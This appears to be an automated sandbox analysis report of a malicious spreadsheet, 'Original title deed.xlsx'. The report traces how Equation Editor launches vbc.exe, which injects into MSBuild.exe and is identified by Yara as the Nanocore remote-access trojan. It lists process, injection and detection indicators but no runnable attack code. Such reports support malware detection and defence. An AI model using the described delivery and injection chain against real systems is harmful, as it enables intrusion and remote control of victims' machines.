Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX

Source: Original title deed.xlsx

Stream path 'EncryptedPackage' entropy: 7.99982473669 (max. 8.0)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2404

Thread sleep time: -360000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_004059F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040659C FindFirstFileA,FindClose,	4_2_0040659C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004027A1 FindFirstFileA,	4_2_004027A1

Source: vbc.exe, 00000006.00000003.2163349232.0000000000553000.00000004.00000001.sdmp	Binary or memory string: Vmciwave.dll
Source: vbc.exe, 0000000A.00000002.2201230427.00000000005D4000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\Public\vbc.exe	Code function: 4_2_10001000 mov eax, dword ptr fs:[00000030h]	4_2_10001000
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003D18AB mov eax, dword ptr fs:[00000030h]	4_2_003D18AB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003D1AC3 mov eax, dword ptr fs:[00000030h]	4_2_003D1AC3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02041AC3 mov eax, dword ptr fs:[00000030h]	6_2_02041AC3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_020418AB mov eax, dword ptr fs:[00000030h]	6_2_020418AB
Source: C:\Users\Public\vbc.exe	Code function: 8_2_01E418AB mov eax, dword ptr fs:[00000030h]	8_2_01E418AB
Source: C:\Users\Public\vbc.exe	Code function: 8_2_01E41AC3 mov eax, dword ptr fs:[00000030h]	8_2_01E41AC3
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00581AC3 mov eax, dword ptr fs:[00000030h]	10_2_00581AC3
Source: C:\Users\Public\vbc.exe	Code function: 10_2_005818AB mov eax, dword ptr fs:[00000030h]	10_2_005818AB
Source: C:\Users\Public\vbc.exe	Code function: 12_2_00431AC3 mov eax, dword ptr fs:[00000030h]	12_2_00431AC3
Source: C:\Users\Public\vbc.exe	Code function: 12_2_004318AB mov eax, dword ptr fs:[00000030h]	12_2_004318AB
Source: C:\Users\Public\vbc.exe	Code function: 14_2_027418AB mov eax, dword ptr fs:[00000030h]	14_2_027418AB
Source: C:\Users\Public\vbc.exe	Code function: 14_2_02741AC3 mov eax, dword ptr fs:[00000030h]	14_2_02741AC3
Source: C:\Users\Public\vbc.exe	Code function: 16_2_005D1AC3 mov eax, dword ptr fs:[00000030h]	16_2_005D1AC3
Source: C:\Users\Public\vbc.exe	Code function: 16_2_005D18AB mov eax, dword ptr fs:[00000030h]	16_2_005D18AB
Source: C:\Users\Public\vbc.exe	Code function: 18_2_00531AC3 mov eax, dword ptr fs:[00000030h]	18_2_00531AC3
Source: C:\Users\Public\vbc.exe	Code function: 18_2_005318AB mov eax, dword ptr fs:[00000030h]	18_2_005318AB
Source: C:\Users\Public\vbc.exe	Code function: 20_2_01F018AB mov eax, dword ptr fs:[00000030h]	20_2_01F018AB
Source: C:\Users\Public\vbc.exe	Code function: 20_2_01F01AC3 mov eax, dword ptr fs:[00000030h]	20_2_01F01AC3
Source: C:\Users\Public\vbc.exe	Code function: 22_2_01F418AB mov eax, dword ptr fs:[00000030h]	22_2_01F418AB
Source: C:\Users\Public\vbc.exe	Code function: 22_2_01F41AC3 mov eax, dword ptr fs:[00000030h]	22_2_01F41AC3
Source: C:\Users\Public\vbc.exe	Code function: 24_2_00541AC3 mov eax, dword ptr fs:[00000030h]	24_2_00541AC3
Source: C:\Users\Public\vbc.exe	Code function: 24_2_005418AB mov eax, dword ptr fs:[00000030h]	24_2_005418AB
Source: C:\Users\Public\vbc.exe	Code function: 26_2_027418AB mov eax, dword ptr fs:[00000030h]	26_2_027418AB
Source: C:\Users\Public\vbc.exe	Code function: 26_2_02741AC3 mov eax, dword ptr fs:[00000030h]	26_2_02741AC3
Source: C:\Users\Public\vbc.exe	Code function: 28_2_00431AC3 mov eax, dword ptr fs:[00000030h]	28_2_00431AC3
Source: C:\Users\Public\vbc.exe	Code function: 28_2_004318AB mov eax, dword ptr fs:[00000030h]	28_2_004318AB
Source: C:\Users\Public\vbc.exe	Code function: 30_2_027418AB mov eax, dword ptr fs:[00000030h]	30_2_027418AB
Source: C:\Users\Public\vbc.exe	Code function: 30_2_02741AC3 mov eax, dword ptr fs:[00000030h]	30_2_02741AC3
Source: C:\Users\Public\vbc.exe	Code function: 32_2_003F18AB mov eax, dword ptr fs:[00000030h]	32_2_003F18AB
Source: C:\Users\Public\vbc.exe	Code function: 32_2_003F1AC3 mov eax, dword ptr fs:[00000030h]	32_2_003F1AC3
Source: C:\Users\Public\vbc.exe	Code function: 34_2_10001000 mov eax, dword ptr fs:[00000030h]	34_2_10001000
Source: C:\Users\Public\vbc.exe	Code function: 34_2_01D61AC3 mov eax, dword ptr fs:[00000030h]	34_2_01D61AC3
Source: C:\Users\Public\vbc.exe	Code function: 34_2_01D618AB mov eax, dword ptr fs:[00000030h]	34_2_01D618AB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000147A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_1000147A
Source: C:\Users\Public\vbc.exe	Code function: 34_2_1000147A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		34_2_1000147A

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: unknown unknown

Source: C:\Users\Public\vbc.exe

4_2_00403461

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
Source: Yara match	File source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: vbc.exe, 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: vbc.exe, 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: vbc.exe, 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
